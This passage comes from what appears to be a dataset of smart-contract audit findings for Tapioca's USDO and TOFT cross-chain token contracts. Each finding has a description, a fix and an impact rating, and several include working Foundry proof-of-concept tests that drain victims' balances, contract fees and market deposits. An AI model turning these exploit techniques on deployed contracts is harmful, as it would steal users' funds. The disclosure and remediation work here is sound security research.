tokens to be burnt, and a final message is triggered to the destination chain\\n UsdoReceiver(address(aUsdo)).lzCompose(\\n address(aUsdo), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked(OFTMsgCodec.addressToBytes32(address(makeAddr(""victim""))), toeComposeMsgVictim), // message (srcChainSender becomes victim because of wrong parameter set)\\n address(0), // executor (not used)\\n bytes("""") // extra data (not used)\\n );\\n\\n // Back to chain B. Finally, the burnt tokens from the victim in chain A get minted in chain B with the attacker set as the destination\\n {\\n uint64 tokenAmountSD = usdoHelper.toSD(100 ether, bUsdo.decimalConversionRate());\\n \\n vm.startPrank(endpoints[bEid]);\\n UsdoReceiver(address(bUsdo)).lzReceive(\\n Origin({sender: OFTMsgCodec.addressToBytes32(address(aUsdo)), srcEid: aEid, nonce: 0}), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked( // same as _buildOFTMsgAndOptions()\\n OFTMsgCodec.addressToBytes32(makeAddr(""attacker"")),\\n tokenAmountSD\\n ), // message\\n address(0), // executor (not used)\\n bytes("""") // extra data (not used)\\n );\\n\\n }\\n\\n // Finished: victim gets drained, attacker obtains balance of victim\\n assertEq(bUsdo.balanceOf(makeAddr(""victim"")), 0);\\n assertEq(bUsdo.balanceOf(makeAddr(""attacker"")), 100 ether);\\n \\n } \\n```\\n\\nRun the poc with the following command: `forge test --mt testVuln_stealUSDOFromATargetUserDueToWrongParameter`\\nThe proof of concept shows how in the end, the victim's `aUsdo` balance will become 0, while all the `bUsdo` in chain B will be minted to the attacker.","Change the parameter passed in the `_internalRemoteTransferSendPacket()` call so that the sender in the compose call built inside it is actually the real source chain sender. 
This will make it be kept along all the possible recursive calls that might take place:\\n```\\nfunction _remoteTransferReceiver(address _srcChainSender, bytes memory _data) internal virtual {\\n RemoteTransferMsg memory remoteTransferMsg_ = TapiocaOmnichainEngineCodec.decodeRemoteTransferMsg(_data);\\n\\n /// @dev xChain owner needs to have approved dst srcChain `sendPacket()` msg.sender in a previous composedMsg. Or be the same address.\\n _internalTransferWithAllowance(\\n remoteTransferMsg_.owner, _srcChainSender, remoteTransferMsg_.lzSendParam.sendParam.amountLD\\n ); \\n \\n // Make the internal transfer, burn the tokens from this contract and send them to the recipient on the other chain.\\n _internalRemoteTransferSendPacket(\\n// Remove the line below\\n remoteTransferMsg_.owner,\\n// Add the line below\\n _srcChainSender,\\n remoteTransferMsg_.lzSendParam, \\n remoteTransferMsg_.composeMsg \\n ); \\n \\n emit RemoteTransferReceived(\\n remoteTransferMsg_.owner,\\n remoteTransferMsg_.lzSendParam.sendParam.dstEid,\\n OFTMsgCodec.bytes32ToAddress(remoteTransferMsg_.lzSendParam.sendParam.to),\\n remoteTransferMsg_.lzSendParam.sendParam.amountLD\\n );\\n }\\n```\\n",High. An attacker can drain any USDO holder's balance and transfer it to themselves.,"```\\n// TapiocaOmnichainReceiver.sol\\nfunction lzCompose( \\n address _from,\\n bytes32 _guid,\\n bytes calldata _message,\\n address, //executor\\n bytes calldata //extra Data\\n ) external payable override {\\n // rest of code\\n \\n // Decode LZ compose message.\\n (address srcChainSender_, bytes memory oftComposeMsg_) =\\n TapiocaOmnichainEngineCodec.decodeLzComposeMsg(_message);\\n\\n // Execute the composed message. 
\\n _lzCompose(srcChainSender_, _guid, oftComposeMsg_); \\n }\\n```\\n" +Recursive _lzCompose() call can be leveraged to steal all generated USDO fees,high,"It is possible to steal all generated USDO fees by leveraging the recursive _lzCompose() call triggered in compose calls.\\nThe `USDOFlashloanHelper` contract allows users to take USDO flash loans. When a user takes a flash loan some fees will be enforced and transferred to the USDO contract:\\n```\\n// USDOFlashloanHelper.sol\\nfunction flashLoan(IERC3156FlashBorrower receiver, address token, uint256 amount, bytes calldata data)\\n external\\n override\\n returns (bool)\\n {\\n \\n // rest of code\\n\\n IERC20(address(usdo)).safeTransferFrom(address(receiver), address(usdo), fee);\\n \\n _flashloanEntered = false;\\n\\n return true;\\n }\\n```\\n\\nSuch fees can be later retrieved by the owner of the USDO contract via the `extractFees()` function:\\n```\\n// Usdo.sol\\nfunction extractFees() external onlyOwner { \\n if (_fees > 0) {\\n uint256 balance = balanceOf(address(this));\\n\\n uint256 toExtract = balance >= _fees ? _fees : balance;\\n _fees -= toExtract;\\n _transfer(address(this), msg.sender, toExtract);\\n }\\n }\\n```\\n\\nHowever, such fees can be stolen by an attacker by leveraging a wrong parameter set when performing a compose call.\\nWhen a compose call is triggered, the internal `_lzCompose()` call will be triggered. This call will check the `msgType_` and execute some logic according to the type of message requested. After executing the corresponding logic, it will be checked if there is an additional message by checking the `nextMsg_.length`. 
If the compose call had a next message to be called, a recursive call will be triggered and `_lzCompose()` will be called again:\\n```\\n// TapiocaOmnichainReceiver.sol\\n\\nfunction _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n \\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // Call Permits/approvals if the msg type is a permit/approval.\\n // If the msg type is not a permit/approval, it will call the other receivers. \\n if (msgType_ == MSG_REMOTE_TRANSFER) { \\n _remoteTransferReceiver(srcChainSender_, tapComposeMsg_); \\n } else if (!_extExec(msgType_, tapComposeMsg_)) { \\n // Check if the TOE extender is set and the msg type is valid. If so, call the TOE extender to handle msg.\\n if ( \\n address(tapiocaOmnichainReceiveExtender) != address(0)\\n && tapiocaOmnichainReceiveExtender.isMsgTypeValid(msgType_)\\n ) { \\n bytes memory callData = abi.encodeWithSelector(\\n ITapiocaOmnichainReceiveExtender.toeComposeReceiver.selector,\\n msgType_,\\n srcChainSender_, \\n tapComposeMsg_\\n ); \\n (bool success, bytes memory returnData) =\\n address(tapiocaOmnichainReceiveExtender).delegatecall(callData);\\n if (!success) {\\n revert(_getTOEExtenderRevertMsg(returnData));\\n }\\n } else {\\n // If no TOE extender is set or msg type doesn't match extender, try to call the internal receiver.\\n if (!_toeComposeReceiver(msgType_, srcChainSender_, tapComposeMsg_)) {\\n revert InvalidMsgType(msgType_);\\n }\\n }\\n }\\n \\n emit ComposeReceived(msgType_, _guid, tapComposeMsg_);\\n if (nextMsg_.length > 0) {\\n _lzCompose(address(this), _guid, nextMsg_);\\n }\\n }\\n```\\n\\nAs we can see in the code snippet's last line, if `nextMsg_.length > 0` an additional compose call can be triggered . 
The problem with this call is that the first parameter in the `_lzCompose()` call is hardcoded to be `address(this)` (address of USDO), making the `srcChainSender_` become the USDO address in the recursive compose call.\\nAn attacker can then leverage the remote transfer logic in order to steal all the USDO tokens held in the USDO contract (mainly fees generated by flash loans).\\nForcing the recursive call to be a remote transfer, `_remoteTransferReceiver()` will be called. Because the source chain sender in the recursive call is the USDO contract, the `owner` parameter in the remote transfer (the address from which the remote transfer tokens are burnt) can also be set to the USDO address, making the allowance check in the `_internalTransferWithAllowance()` call be bypassed, and effectively burning a desired amount from USDO.\\n```\\n// USDO.sol\\nfunction _remoteTransferReceiver(address _srcChainSender, bytes memory _data) internal virtual {\\n RemoteTransferMsg memory remoteTransferMsg_ = TapiocaOmnichainEngineCodec.decodeRemoteTransferMsg(_data);\\n\\n \\n /// @dev xChain owner needs to have approved dst srcChain `sendPacket()` msg.sender in a previous composedMsg. Or be the same address.\\n _internalTransferWithAllowance(\\n remoteTransferMsg_.owner, _srcChainSender, remoteTransferMsg_.lzSendParam.sendParam.amountLD\\n ); \\n \\n // rest of code\\n }\\n\\nfunction _internalTransferWithAllowance(address _owner, address srcChainSender, uint256 _amount) internal {\\n \\n if (_owner != srcChainSender) { // <------- `_owner` and `srcChainSender` will both be the USDO address, so the check in `_spendAllowance()` won't be performed\\n _spendAllowance(_owner, srcChainSender, _amount);\\n }\\n \\n _transfer(_owner, address(this), _amount);\\n } \\n```\\n\\nAfter burning the tokens from USDO, the remote transfer will trigger a call to a destination chain to mint the burnt tokens in the origin chain. 
The receiver of the tokens can be different from the address whose tokens were burnt, so an attacker can obtain the minted tokens in the destination chain, effectively stealing all USDO balance from the USDO contract.\\nAn example attack path would be:\\nAn attacker creates a compose call from chain A to chain B. This compose call is actually composed of two messages:\\nThe first message, which won't affect the attack and is simply the initial step to trigger the attack in the destination chain\\nThe second message (nextMsg), which is the actual compose message that will trigger the remote transfer and burn the tokens in chain B, and finally trigger a call back to chain A to mint he tokens\\nThe call is executed, chain B receives the call and triggers the first compose message (as demonstrated in the PoC, this first message is not important and can simply be a remote transfer call with a 0 amount of tokens). After triggering the first compose call, the second compose message is triggered. The USDO contract is set as the source chain sender and the remote transfer is called. Because the owner set in the compose call and the source chain sender are the same, the specified tokens in the remote transfer are directly burnt\\nFinally, the compose call triggers a call back to chain A to mint the burnt tokens in chain B, and tokens are minted to the attacker\\n\\nThe following proof of concept illustrates how the mentioned attack can take place. 
In order to execute the PoC, the following steps must be performed:\\nCreate an `EnpointMock.sol` file inside the `test` folder inside `Tapioca-bar` and paste the following code (the current tests are too complex, this imitates LZ's endpoint contracts and reduces the poc's complexity):\\n```\\n// SPDX-License-Identifier: LZBL-1.2\\n\\npragma solidity ^0.8.20;\\n\\nstruct MessagingReceipt {\\n bytes32 guid;\\n uint64 nonce;\\n MessagingFee fee;\\n}\\n\\nstruct MessagingParams {\\n uint32 dstEid;\\n bytes32 receiver;\\n bytes message;\\n bytes options; \\n bool payInLzToken;\\n}\\n\\nstruct MessagingFee {\\n uint256 nativeFee;\\n uint256 lzTokenFee;\\n}\\ncontract MockEndpointV2 {\\n\\n \\n function send(\\n MessagingParams calldata _params,\\n address _refundAddress\\n ) external payable returns (MessagingReceipt memory receipt) {\\n // DO NOTHING\\n }\\n\\n /// @dev the Oapp sends the lzCompose message to the endpoint\\n /// @dev the composer MUST assert the sender because anyone can send compose msg with this function\\n /// @dev with the same GUID, the Oapp can send compose to multiple _composer at the same time\\n /// @dev authenticated by the msg.sender\\n /// @param _to the address which will receive the composed message\\n /// @param _guid the message guid\\n /// @param _message the message\\n function sendCompose(address _to, bytes32 _guid, uint16 _index, bytes calldata _message) external {\\n // DO NOTHING\\n \\n }\\n \\n}\\n```\\n\\nImport and deploy two mock endpoints in the `Usdo.t.sol` file\\nChange the inherited OApp in `Usdo.sol` 's implementation so that the endpoint variable is not immutable and add a `setEndpoint()` function so that the endpoint configured in `setUp()` can be chainged to the newly deployed endpoints\\nPaste the following test insde `Usdo.t.sol` :\\n```\\nfunction testVuln_USDOBorrowFeesCanBeDrained() public {\\n\\n // Change configured enpoints\\n\\n endpoints[aEid] = address(mockEndpointV2A);\\n endpoints[bEid] = 
address(mockEndpointV2B);\\n\\n aUsdo.setEndpoint(address(mockEndpointV2A));\\n bUsdo.setEndpoint(address(mockEndpointV2B));\\n\\n \\n // Mock generated fees\\n deal(address(bUsdo), address(bUsdo), 100 ether);\\n\\n ////////////////////////////////////////////////////////\\n // PREPARE MESSAGES //\\n ////////////////////////////////////////////////////////\\n\\n // NEXT MESSAGE B --> A (EXECUTED AS THE nextMsg after the INITIAL B --> A MESSAGE) \\n\\n SendParam memory sendParamAToBVictim = SendParam({\\n dstEid: aEid,\\n to: OFTMsgCodec.addressToBytes32(makeAddr(""attacker"")),\\n amountLD: 100 ether, // IMPORTANT: This must be set to the amount we want to steal\\n minAmountLD: 100 ether,\\n extraOptions: bytes(""""),\\n composeMsg: bytes(""""),\\n oftCmd: bytes("""")\\n }); \\n MessagingFee memory feeAToBVictim = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamAToBVictim = LZSendParam({\\n sendParam: sendParamAToBVictim,\\n fee: feeAToBVictim,\\n extraOptions: bytes(""""),\\n refundAddress: makeAddr(""attacker"")\\n });\\n\\n RemoteTransferMsg memory remoteTransferMsgVictim = RemoteTransferMsg({\\n owner: address(bUsdo), // IMPORTANT: This will make the attack be triggered as bUsdo will become the srcChainSender in the nextMsg compose call\\n composeMsg: bytes(""""),\\n lzSendParam: lzSendParamAToBVictim\\n });\\n\\n uint16 index; // needed to bypass Solidity's encoding literal error\\n // Create Toe Compose message for the victim\\n bytes memory toeComposeMsgVictim = abi.encodePacked(\\n PT_REMOTE_TRANSFER, // msgType\\n uint16(abi.encode(remoteTransferMsgVictim).length), // message length (0)\\n index, // index\\n abi.encode(remoteTransferMsgVictim), // message\\n bytes("""") // next message\\n );\\n \\n // SECOND MESSAGE (composed) B ---> A \\n // This second message is a necessary step in order to reach the execution\\n // inside `_lzCompose()` where the nextMsg can be triggered\\n\\n SendParam memory sendParamBToA 
= SendParam({\\n dstEid: aEid,\\n to: OFTMsgCodec.addressToBytes32(address(aUsdo)),\\n amountLD: 0, \\n minAmountLD: 0,\\n extraOptions: bytes(""""),\\n composeMsg: bytes(""""),\\n oftCmd: bytes("""")\\n }); \\n MessagingFee memory feeBToA = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamBToA = LZSendParam({\\n sendParam: sendParamBToA,\\n fee: feeBToA,\\n extraOptions: bytes(""""),\\n refundAddress: makeAddr(""attacker"")\\n });\\n\\n // Create remote transfer message\\n RemoteTransferMsg memory remoteTransferMsg = RemoteTransferMsg({\\n owner: makeAddr(""attacker""),\\n composeMsg: bytes(""""),\\n lzSendParam: lzSendParamBToA\\n });\\n\\n // Create Toe Compose message\\n bytes memory toeComposeMsg = abi.encodePacked(\\n PT_REMOTE_TRANSFER, // msgType\\n uint16(abi.encode(remoteTransferMsg).length), // message length\\n index, // index\\n abi.encode(remoteTransferMsg),\\n toeComposeMsgVictim // next message: IMPORTANT to set this to the A --> B message that will be triggered as the `nextMsg`\\n );\\n \\n // INITIAL MESSAGE A ---> B \\n\\n // Create `_lzSendParam` parameter for `sendPacket()`\\n SendParam memory sendParamAToB = SendParam({\\n dstEid: bEid,\\n to: OFTMsgCodec.addressToBytes32(makeAddr(""attacker"")), // address here doesn't matter\\n amountLD: 0,\\n minAmountLD: 0,\\n extraOptions: bytes(""""),\\n composeMsg: bytes(""""),\\n oftCmd: bytes("""")\\n }); \\n MessagingFee memory feeAToB = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamAToB = LZSendParam({\\n sendParam: sendParamAToB,\\n fee: feeAToB,\\n extraOptions: bytes(""""),\\n refundAddress: makeAddr(""attacker"")\\n });\\n\\n vm.startPrank(makeAddr(""attacker""));\\n aUsdo.sendPacket(lzSendParamAToB, toeComposeMsg);\\n\\n // EXECUTE ATTACK\\n\\n // Execute first lzReceive() --> receive message in chain B\\n \\n vm.startPrank(endpoints[bEid]);\\n UsdoReceiver(address(bUsdo)).lzReceive(\\n Origin({sender: 
OFTMsgCodec.addressToBytes32(address(aUsdo)), srcEid: aEid, nonce: 0}), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked( // same as _buildOFTMsgAndOptions()\\n sendParamAToB.to,\\n index, // amount (use an initialized 0 variable due to Solidity restrictions)\\n OFTMsgCodec.addressToBytes32(makeAddr(""attacker"")), // initially, the sender for the first A --> B message is the attacker\\n toeComposeMsg\\n ), // message\\n address(0), // executor (not used)\\n bytes("""") // extra data (not used)\\n );\\n\\n // Compose message is sent in `lzReceive()`, we need to trigger `lzCompose()`.\\n // bUsdo will be burnt from the bUSDO address, and nextMsg will be triggered to mint the burnt amount in chain A, having \\n // the attacker as the receiver\\n UsdoReceiver(address(bUsdo)).lzCompose(\\n address(bUsdo), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked(OFTMsgCodec.addressToBytes32(address(aUsdo)), toeComposeMsg), // message\\n address(0), // executor (not used)\\n bytes("""") // extra data (not used)\\n );\\n\\n vm.startPrank(endpoints[aEid]);\\n\\n // Receive nextMsg in chain A, mint tokens to the attacker\\n uint64 tokenAmountSD = usdoHelper.toSD(100 ether, aUsdo.decimalConversionRate());\\n\\n UsdoReceiver(address(aUsdo)).lzReceive(\\n Origin({sender: OFTMsgCodec.addressToBytes32(address(bUsdo)), srcEid: bEid, nonce: 0}), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked( // same as _buildOFTMsgAndOptions()\\n OFTMsgCodec.addressToBytes32(makeAddr(""attacker"")),\\n tokenAmountSD\\n ), // message\\n address(0), // executor (not used)\\n bytes("""") // extra data (not used)\\n );\\n \\n\\n // Finished: bUSDO fees get drained, attacker obtains all the fees in the form of aUSDO\\n assertEq(bUsdo.balanceOf(address(bUsdo)), 0);\\n assertEq(aUsdo.balanceOf(makeAddr(""attacker"")), 100 ether);\\n \\n }\\n```\\n\\nRun the poc 
with the following command: `forge test --mt testVuln_USDOBorrowFeesCanBeDrained`\\nThe proof of concept shows how in the end, USDO's `bUsdo` balance will become 0, while the same amount ofaUsdo in chain A will be minted to the attacker.","Ensure that the `_lzCompose()` call triggered when a `_nextMsg` exists keeps a consistent source chain sender address, instead of hardcoding it to `address(this)` :\\n```\\n// TapiocaOmnichainReceiver.sol\\n\\nfunction _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n \\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // rest of code\\n \\n emit ComposeReceived(msgType_, _guid, tapComposeMsg_);\\n if (nextMsg_.length > 0) {\\n// Remove the line below\\n _lzCompose(address(this), _guid, nextMsg_);‚\\n// Add the line below\\n _lzCompose(srcChainSender_, _guid, nextMsg_);\\n }\\n }\\n```\\n","High, all fees generated by the USDO contract can be effectively stolen by the attacker","```\\n// USDOFlashloanHelper.sol\\nfunction flashLoan(IERC3156FlashBorrower receiver, address token, uint256 amount, bytes calldata data)\\n external\\n override\\n returns (bool)\\n {\\n \\n // rest of code\\n\\n IERC20(address(usdo)).safeTransferFrom(address(receiver), address(usdo), fee);\\n \\n _flashloanEntered = false;\\n\\n return true;\\n }\\n```\\n" +Unprotected `executeModule` function allows to steal the tokens,high,"The `executeModule` function allows anyone to execute any module with any params. That allows attacker to execute operations on behalf of other users.\\nHere is the `executeModule` function:\\nAll its parameters are controlled by the caller and anyone can be the caller. 
Anyone can execute any module on behalf of any user.\\nLet's try to steal someone's tokens using `UsdoMarketReceiver` module and `removeAssetReceiver` function (below is the PoC).\\nHere is the code that will call the `executeModule` function:\\n```\\nbUsdo.executeModule(\\n IUsdo.Module.UsdoMarketReceiver, \\n abi.encodeWithSelector(\\n UsdoMarketReceiverModule.removeAssetReceiver.selector, \\n marketMsg_), \\n false);\\n```\\n\\nThe important value here is the `marketMsg_` parameter. The `removeAssetReceiver` function forwards the call to `exitPositionAndRemoveCollateral` function via magnetar contract.\\nThe `exitPositionAndRemoveCollateral` function removes asset from Singularity market if the `data.removeAndRepayData.removeAssetFromSGL` is `true`. The amount is taken from `data.removeAndRepayData.removeAmount`. Then, if `data.removeAndRepayData.assetWithdrawData.withdraw` is `true`, the `_withdrawToChain` is called.\\nIn `_withdrawToChain`, if the `data.lzSendParams.sendParam.dstEid` is zero, the `_withdrawHere` is called that transfers asset to `data.lzSendParams.sendParam.to`.\\nSumming up, the following `marketMsg_` struct can be used to steal userB's assets from singularity market by `userA`.\\n```\\nMarketRemoveAssetMsg({\\n user: address(userB),//victim\\n externalData: ICommonExternalContracts({\\n magnetar: address(magnetar),\\n singularity: address(singularity),\\n bigBang: address(0),\\n marketHelper: address(marketHelper)\\n }),\\n removeAndRepayData: IRemoveAndRepay({\\n removeAssetFromSGL: true,//remove from Singularity market\\n removeAmount: tokenAmountSD,//amount to remove\\n repayAssetOnBB: false,\\n repayAmount: 0,\\n removeCollateralFromBB: false,\\n collateralAmount: 0,\\n exitData: IOptionsExitData({exit: false, target: address(0), oTAPTokenID: 0}),\\n unlockData: IOptionsUnlockData({unlock: false, target: address(0), tokenId: 0}),\\n assetWithdrawData: MagnetarWithdrawData({\\n withdraw: true,//withdraw assets\\n yieldBox: 
address(yieldBox), //where from to withdraw\\n assetId: bUsdoYieldBoxId, //what asset to withdraw\\n unwrap: false,\\n lzSendParams: LZSendParam({\\n refundAddress: address(userB),\\n fee: MessagingFee({lzTokenFee: 0, nativeFee: 0}),\\n extraOptions: ""0x"",\\n sendParam: SendParam({\\n amountLD: 0,\\n composeMsg: ""0x"",\\n dstEid: 0,\\n extraOptions: ""0x"",\\n minAmountLD: 0,\\n oftCmd: ""0x"",\\n to: OFTMsgCodec.addressToBytes32(address(userA)) // recipient of the assets\\n })\\n }),\\n sendGas: 0,\\n composeGas: 0,\\n sendVal: 0,\\n composeVal: 0,\\n composeMsg: ""0x"",\\n composeMsgType: 0\\n }),\\n collateralWithdrawData: MagnetarWithdrawData({\\n withdraw: false,\\n yieldBox: address(0),\\n assetId: 0,\\n unwrap: false,\\n lzSendParams: LZSendParam({\\n refundAddress: address(userB),\\n fee: MessagingFee({lzTokenFee: 0, nativeFee: 0}),\\n extraOptions: ""0x"",\\n sendParam: SendParam({\\n amountLD: 0,\\n composeMsg: ""0x"",\\n dstEid: 0,\\n extraOptions: ""0x"",\\n minAmountLD: 0,\\n oftCmd: ""0x"",\\n to: OFTMsgCodec.addressToBytes32(address(userB))\\n })\\n }),\\n sendGas: 0,\\n composeGas: 0,\\n sendVal: 0,\\n composeVal: 0,\\n composeMsg: ""0x"",\\n composeMsgType: 0\\n })\\n })\\n});\\n```\\n\\nHere is the modified version of the `test_market_remove_asset` test that achieves the same result, but with unauthorized call to `executeModule` function. 
The `userA` is the attacker, and `userB` is the victim.\\n```\\n function test_malicious_market_remove_asset() public {\\n uint256 erc20Amount_ = 1 ether;\\n\\n // setup\\n {\\n deal(address(bUsdo), address(userB), erc20Amount_);\\n\\n vm.startPrank(userB);\\n bUsdo.approve(address(yieldBox), type(uint256).max);\\n yieldBox.depositAsset(bUsdoYieldBoxId, address(userB), address(userB), erc20Amount_, 0);\\n\\n uint256 sh = yieldBox.toShare(bUsdoYieldBoxId, erc20Amount_, false);\\n yieldBox.setApprovalForAll(address(pearlmit), true);\\n pearlmit.approve(\\n address(yieldBox), bUsdoYieldBoxId, address(singularity), uint200(sh), uint48(block.timestamp + 1)\\n );\\n singularity.addAsset(address(userB), address(userB), false, sh);\\n vm.stopPrank();\\n }\\n\\n uint256 tokenAmount_ = 0.5 ether;\\n\\n /**\\n * Actions\\n */\\n uint256 tokenAmountSD = usdoHelper.toSD(tokenAmount_, aUsdo.decimalConversionRate());\\n\\n //approve magnetar\\n vm.startPrank(userB);\\n bUsdo.approve(address(magnetar), type(uint256).max);\\n singularity.approve(address(magnetar), type(uint256).max);\\n vm.stopPrank();\\n \\n MarketRemoveAssetMsg memory marketMsg = MarketRemoveAssetMsg({\\n user: address(userB),\\n externalData: ICommonExternalContracts({\\n magnetar: address(magnetar),\\n singularity: address(singularity),\\n bigBang: address(0),\\n marketHelper: address(marketHelper)\\n }),\\n removeAndRepayData: IRemoveAndRepay({\\n removeAssetFromSGL: true,\\n removeAmount: tokenAmountSD,\\n repayAssetOnBB: false,\\n repayAmount: 0,\\n removeCollateralFromBB: false,\\n collateralAmount: 0,\\n exitData: IOptionsExitData({exit: false, target: address(0), oTAPTokenID: 0}),\\n unlockData: IOptionsUnlockData({unlock: false, target: address(0), tokenId: 0}),\\n assetWithdrawData: MagnetarWithdrawData({\\n withdraw: true,\\n yieldBox: address(yieldBox),\\n assetId: bUsdoYieldBoxId,\\n unwrap: false,\\n lzSendParams: LZSendParam({\\n refundAddress: address(userB),\\n fee: MessagingFee({lzTokenFee: 0, 
nativeFee: 0}),\\n extraOptions: ""0x"",\\n sendParam: SendParam({\\n amountLD: 0,\\n composeMsg: ""0x"",\\n dstEid: 0,\\n extraOptions: ""0x"",\\n minAmountLD: 0,\\n oftCmd: ""0x"",\\n to: OFTMsgCodec.addressToBytes32(address(userA)) // transfer to attacker\\n })\\n }),\\n sendGas: 0,\\n composeGas: 0,\\n sendVal: 0,\\n composeVal: 0,\\n composeMsg: ""0x"",\\n composeMsgType: 0\\n }),\\n collateralWithdrawData: MagnetarWithdrawData({\\n withdraw: false,\\n yieldBox: address(0),\\n assetId: 0,\\n unwrap: false,\\n lzSendParams: LZSendParam({\\n refundAddress: address(userB),\\n fee: MessagingFee({lzTokenFee: 0, nativeFee: 0}),\\n extraOptions: ""0x"",\\n sendParam: SendParam({\\n amountLD: 0,\\n composeMsg: ""0x"",\\n dstEid: 0,\\n extraOptions: ""0x"",\\n minAmountLD: 0,\\n oftCmd: ""0x"",\\n to: OFTMsgCodec.addressToBytes32(address(userB))\\n })\\n }),\\n sendGas: 0,\\n composeGas: 0,\\n sendVal: 0,\\n composeVal: 0,\\n composeMsg: ""0x"",\\n composeMsgType: 0\\n })\\n })\\n });\\n bytes memory marketMsg_ = usdoHelper.buildMarketRemoveAssetMsg(marketMsg);\\n\\n\\n // I added _checkSender in MagnetarMock (function exitPositionAndRemoveCollateral) so need to whitelist USDO\\n cluster.updateContract(aEid, address(bUsdo), true);\\n\\n // ----- ADDED THIS ------>\\n // Attack using executeModule\\n // ------------------------\\n vm.startPrank(userA);\\n bUsdo.executeModule(\\n IUsdo.Module.UsdoMarketReceiver, \\n abi.encodeWithSelector(\\n UsdoMarketReceiverModule.removeAssetReceiver.selector, \\n marketMsg_), \\n false);\\n // ------------------------\\n\\n // Check execution\\n {\\n assertEq(bUsdo.balanceOf(address(userB)), 0);\\n assertEq(\\n yieldBox.toAmount(bUsdoYieldBoxId, yieldBox.balanceOf(address(userB), bUsdoYieldBoxId), false),\\n 0\\n );\\n assertEq(bUsdo.balanceOf(address(userA)), tokenAmount_);\\n }\\n }\\n```\\n\\nNote: The `burst` function was modified in the MagnetarMock contract and add call to `_checkSender` function to reproduce the real 
situation.\\nThat is also why the `bUsdo` has been whitelisted in the test.",The `executeModule` function should inspect and validate the `_data` parameter to make sure that the caller is the same address as the user who executes the operations.,HIGH - Anyone can steal others' tokens from their markets.,"```\\nbUsdo.executeModule(\\n IUsdo.Module.UsdoMarketReceiver, \\n abi.encodeWithSelector(\\n UsdoMarketReceiverModule.removeAssetReceiver.selector, \\n marketMsg_), \\n false);\\n```\\n" +Pending allowances can be exploited,high,"Pending allowances can be exploited in multiple places in the codebase.\\n`TOFT::marketRemoveCollateralReceiver` has the following flow:\\nIt calls `removeCollateral` ona a market with the following parameters: `from = msg_user`, `to = msg_.removeParams.magnetar`.\\nInside the `SGLCollateral::removeCollateral` `_allowedBorrow` is called and check if the `from = msg_user` address has given enough `allowanceBorrow` to the `msg.sender` which in this case is the TOFT contract.\\nSo for a user to use this flow in needs to call:\\n```\\nfunction approveBorrow(address spender, uint256 amount) external returns (bool) {\\n _approveBorrow(msg.sender, spender, amount);\\n return true;\\n }\\n```\\n\\nAnd give the needed allowance to the TOFT contract.\\nThis results in collateral being removed and transferred into the Magnetar contract with `yieldBox.transfer(address(this), to, collateralId, share);`.\\nThe Magnetar gets the collateral, and it can withdraw it to any address specified in the `msg_.withdrawParams`.\\nThis is problematic as the `TOFT::marketRemoveCollateralReceiver` doesn't check the `msg.sender`. 
In practice this means if Alice has called `approveBorrow` and gives the needed allowance with the intention of using the `marketRemoveCollateralReceiver` flow, Bob can use the `marketRemoveCollateralReceiver` flow and withdraw all the collateral from Alice to his address.\\nSo, any pending allowances from any user can immediately be exploited to steal the collateral.\\nOther occurrences\\nThere are a few other occurrences of this problematic pattern in the codebase.\\n`TOFT::marketBorrowReceiver` expects the user to give an approval to the Magnetar contract. The approval is expected inside the `_extractTokens` function where `pearlmit.transferFromERC20(_from, address(this), address(_token), _amount);` is called. Again, the `msg.sender` is not checked inside the `marketBorrowReceiver` function, so this flow can be abused by another user to borrow and withdraw the borrowed amount to his address.\\n`TOFT::mintLendXChainSGLXChainLockAndParticipateReceiver` also allows to borrow inside the BigBang market and withdraw the borrowed amount to an arbitrary address.\\n`TOF::exerciseOptionsReceiver` has the `_internalTransferWithAllowance` function that simply allows to transfer TOFT tokens from any `_options.from` address that has given an allowance to `srcChainSender`, by anyone that calls this function. It allows to forcefully call the `exerciseOptionsReceiver` on behalf of any other user.\\n`USDO::depositLendAndSendForLockingReceiver` also expects the user to give an allowance to the Magnetar contract, i.e. `MagnetarAssetXChainModule::depositYBLendSGLLockXchainTOLP` calls the `_extractTokens`.",There are multiple instances of issues with dangling allowances in the protocol. 
Review all the allowance flows and make sure it can't be exploited.,The impact of this vulnerability is that any pending allowances from any user can immediately be exploited to steal the collateral/borrowed amount.,"```\\nfunction approveBorrow(address spender, uint256 amount) external returns (bool) {\\n _approveBorrow(msg.sender, spender, amount);\\n return true;\\n }\\n```\\n" +Incorrect `tapOft` Amounts Will Be Sent to Desired Chains on Certain Conditions,medium,"TOFTOptionsReceiverModule::exerciseOptionsReceiver module, is responsible for facilitating users' token exercises between `mTOFT` and `tapOFT` tokens across different chains. In a `msg-type` where the user wishes to receive the `tapOFT` tokens on a different chain, the module attempts to ensure the amount sent to the user on the desired chain, aligns with the received tap amount in the current chain. However, a flaw exists where the computed amount to send is not updated in the send parameters, resulting in incorrect token transfer.\\nTOFTOptionsReceiverModule::exerciseOptionsReceiver module is a module that enables users to exercise their `mTOFT` tokens for a given amount of `tapOFT` option tokens.\\nWhen the user wishes to withdraw these `tapOft` tokens on a different chain, the withdrawOnOtherChain param will be set to true. For this composed call type, the contract attempts to ensure the amount to send to the user on the other chain isn't more than the received `tap amount`, by doing this:\\n```\\n uint256 amountToSend = _send.amountLD > _options.tapAmount ? 
